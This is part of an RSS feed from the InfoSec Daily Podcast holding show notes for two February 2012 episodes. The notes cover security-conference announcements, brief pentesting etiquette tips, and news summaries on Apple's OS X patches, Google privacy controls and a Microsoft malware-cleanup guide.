<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I wonder what Bottin Cartographes will do when OpenStreetMaps finishes producing high-quality, free, public domain maps of France that can be used to create APIs of the same scope and utility?</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-584-episode-584-os-x-10-7-3-htc-wifi-oops-leading-hackers-passware-verisign/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3452/0/infosec-daily-podcast-episode-584.mp3" length="18427071" type="audio/mpeg" />
		<itunes:duration>0:38:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 584 for February 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 584 for February 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212
Apple has released a massive set of patches for a wide range of security vulnerabilities in a number of its products and components, including OSX Lion and QuickTime. The patches, which are rolled up in OS X 10.7.3, fix a slew of serious bugs, many of which can be used to execute remote code on vulnerable machines.
One of the more serious vulnerabilities Apple fixed is the flaw that researchers Juliano Rizzo and Thai Duong discovered in the TLS 1.0 and SSL 3.0 protocols last year. The vulnerability, for which they wrote a proof-of-concept exploit tool called BEAST, is fixed in the new version of Apache that Apple included in yesterday&#39;s patches. Exploiting the flaw enables an attacker to decrypt some SSL sessions.
&#34;There[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 583 &#8211; Pentest Lessons, DNT for Google, 7-Step Program, Captcha Cracking Malware &amp; Mobile Device Privacy Act</title>
		<link>http://www.isdpodcast.com/episode-583-pentest-lessons-dnt-for-google-7-step-program-captcha-cracking-malware-mobile-device-privacy-act</link>
		<comments>http://www.isdpodcast.com/episode-583-pentest-lessons-dnt-for-google-7-step-program-captcha-cracking-malware-mobile-device-privacy-act#comments</comments>
		<pubDate>Thu, 02 Feb 2012 01:48:33 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3447</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 583 for February 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 583 for February 1, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When having a pentest performed, the customer should not disregard all alerts. While unlikely, an unrelated attack may still be happening. &nbsp;When alerts occur during a pentest, the customer should always validate them against the pentester&#39;s IP addresses.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> When using an exploit during a pentest, only use trusted and tested exploits. Do NOT assume that the exploit you just downloaded is safe.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> When performing physical pentesting (sneaking in, by passing security, picking locks, etc&#8230;) ALWAYS have a good GET OUT OF JAIL FREE CARD!</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Much has been made of Google&#39;s new privacy policy, which takes effect March 1. If you&#39;re concerned about Google misusing your personal information or sharing too much of it with advertisers and others, there are plenty of ways to thwart Web trackers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But what exactly are you thwarting? You don&#39;t become anonymous when you block tracking cookies, Web beacons, and the other identifiers as you browse. Your ISP and the sites you visit still know a lot about you, courtesy of the identifying information served up automatically by your browser.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Electronic Frontier Foundation offers the Panopticlick service that rates the anonymity of your browser. The test shows you the identifiable information provided by your browser and generates a numerical rating that indicates how easy it would be to identify you based solely on your browser&#39;s fingerprint.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According the the entropy theory explained by Peter Eckersley on the EFF&#39;s DeepLinks blog, 33 bits of entropy are sufficient to identify a person. According to Eckersley, knowing a person&#39;s birth date and month (not year) and ZIP code gives you 32 bits of entropy. Also knowing the person&#39;s gender (50-50, so one bit of entropy) gets you to the identifiable threshold of 33 bits.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prominent in the Google privacy policy are links to services that let you view and manage the information you share with Google. Some of this personal data you volunteer, and some of it is collected by Google as you search, browse, and use other services.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To view everything (almost) Google knows about you, open the Google Dashboard. Here you can access all the services associated with your Google account: Gmail, Google Docs, YouTube, Picasa, Blogger, AdSense, and every other Google property. The dashboard also lets you manage your contacts, calendar, Google Groups, Web history, Google Voice account, and other services.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More importantly, you can view and edit the personal information stored by each Google service, or delete the service altogether. To see which other services have access to the account&#39;s information, click &quot;Websites authorized to access the account&quot; at the top of the Dashboard. To block an authorized service from accessing the account, click Revoke Access next to the service name.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Google Ads Preferences Manager lets you block specific advertisers or opt out of all targeted advertising. Click the &quot;Ads on the web&quot; link in the left column and then choose &quot;add or edit&quot; under &quot;Your categories and demographics&quot; to select the categories of ads you want to be served or to opt out of personalized ads.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.microsoft.com/security/sir/strategy/default.aspx#%21malwarecleaning"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.microsoft.com/security/sir/strategy/default.aspx#!malwarecleaning</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has published a 7-step guide for cleaning malware off of an infected system. &nbsp;This is a welcome contrast to Apple&rsquo;s policy of denying that OS X could ever be infected in the first place. &nbsp;The guide makes use of Microsoft&rsquo;s Sysinternals suite of tools and serves as a good basis of removing infections from any system that you don&rsquo;t want to reinstall. &nbsp;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The guidance in IT Pro Advanced Techniques helps IT professionals investigate, analyze, and&mdash;when possible&mdash;remove malware from an infected computer. This guidance, intended for advanced users, helps IT professionals understand the impact of malware and create a rudimentary roadmap for cleaning infected computers. In addition, this effort provides the user more information about the internal operation of malware.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The guidance involves the use of several</span><a href="http://www.sysinternals.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Windows Sysinternals tools</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a suite of advanced diagnostics and troubleshooting utilities for the Windows platform available for download at no charge from the Microsoft Download Center. &ldquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
